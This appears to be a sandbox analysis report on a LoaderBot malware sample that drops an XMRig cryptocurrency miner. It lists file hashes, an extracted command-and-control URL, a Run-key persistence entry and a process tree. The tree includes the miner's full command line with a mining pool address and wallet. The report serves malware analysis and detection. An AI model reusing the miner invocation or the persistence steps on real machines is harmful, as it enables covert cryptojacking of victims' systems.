loaderbot | 9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
23-06-2024 09:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe
Size

4.8MB
MD5

1fecbc51b5620e578c48a12ebeb19bc2
SHA1

94fe551f4fb3ff76a0be99a962dc20fc2656453e
SHA256

9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
SHA512

ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7
SSDEEP

98304:6qwWqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMg:6qwWqw0v7DnZu5NnobnDtl4TjZ8X1/Qf

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Extracted

Family

loaderbot

https://cv99160.tw1.ru/cmd.php

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral2/files/0x001b00000002ab39-15.dat	loaderbot
behavioral2/memory/432-22-0x00000000000F0000-0x00000000004EE000-memory.dmp	loaderbot

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/3636-38-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-39-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-40-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-41-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-42-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-43-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-44-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-45-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-46-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-47-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-48-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-49-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-50-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/3636-51-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	yondex.exe

Executes dropped EXE 3 IoCs

pid	Process
1204	rolex.exe
432	yondex.exe
3636	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\yondex.exe"	yondex.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe
432	yondex.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	432	yondex.exe
Token: SeLockMemoryPrivilege	3636	Driver.exe
Token: SeLockMemoryPrivilege	3636	Driver.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 4960	4936	9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe	76
PID 4936 wrote to memory of 4960	4936	9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe	76
PID 4960 wrote to memory of 1204	4960	cmd.exe	80
PID 4960 wrote to memory of 1204	4960	cmd.exe	80
PID 1204 wrote to memory of 432	1204	rolex.exe	81
PID 1204 wrote to memory of 432	1204	rolex.exe	81
PID 1204 wrote to memory of 432	1204	rolex.exe	81
PID 432 wrote to memory of 3636	432	yondex.exe	83
PID 432 wrote to memory of 3636	432	yondex.exe	83

C:\Users\Admin\AppData\Local\Temp\9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe
"C:\Users\Admin\AppData\Local\Temp\9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
    rolex.exe -priverdD
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:432
    - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
36B

MD5
ce32eea7c273547d3fb75f8e4191e25a

SHA1
07d0edd1f64c799b01da4e670126b4b2c5091dde

SHA256
940d3c2d3a6665d5017c0bf64120a71b2ce61106ae015399282ae8f4656cb91f

SHA512
56da0be9e79b98fb276a6d5a26b2fe06035d46e299fc6e6cb4e04bb396d119204881518e93f2184a68aa34ff024f81281f131ff0f98cf39541cf857c96da95d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe

Filesize
4.4MB

MD5
8866d677a3309a0ad903f37557c5941b

SHA1
2b03d0c6cb74defedfc31154c57b073c889ea11a

SHA256
ecbccacd00cdf38870bea7d203909da1ea2261477125ff7e0bdcef5f3fc4d17d

SHA512
15535e08a5e224941610c90f0ba3921bb3a1911380889d393aedbc2e4806910171c81005cda27d23466292daec606abcb94d0fbf546430d70ea21de15cfe406e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe

Filesize
4.0MB

MD5
bd2413c32e34d0031f7881d51ae731ff

SHA1
8771733c460f22adc0e1865f0b3f2ac19e9c1001

SHA256
277e5a809506398685fe20ba674b7f3f75b2e04a34c2b150a84088b266138894

SHA512
612c8b9f86308b13342cef00b9166084bf36f44addd139a0123f84cf9711fb2f03e15e4a0b3d95a6deaafb60bca1cc1436514b2b96f4aaf18b094534c94974cf

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/432-22-0x00000000000F0000-0x00000000004EE000-memory.dmp

Filesize
4.0MB

Download
memory/432-25-0x0000000005240000-0x00000000052A6000-memory.dmp

Filesize
408KB

Download
memory/3636-40-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-43-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-38-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-39-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-37-0x0000000000570000-0x0000000000584000-memory.dmp

Filesize
80KB

Download
memory/3636-41-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-42-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-36-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-44-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-45-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-46-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-47-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-48-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-49-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3636-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download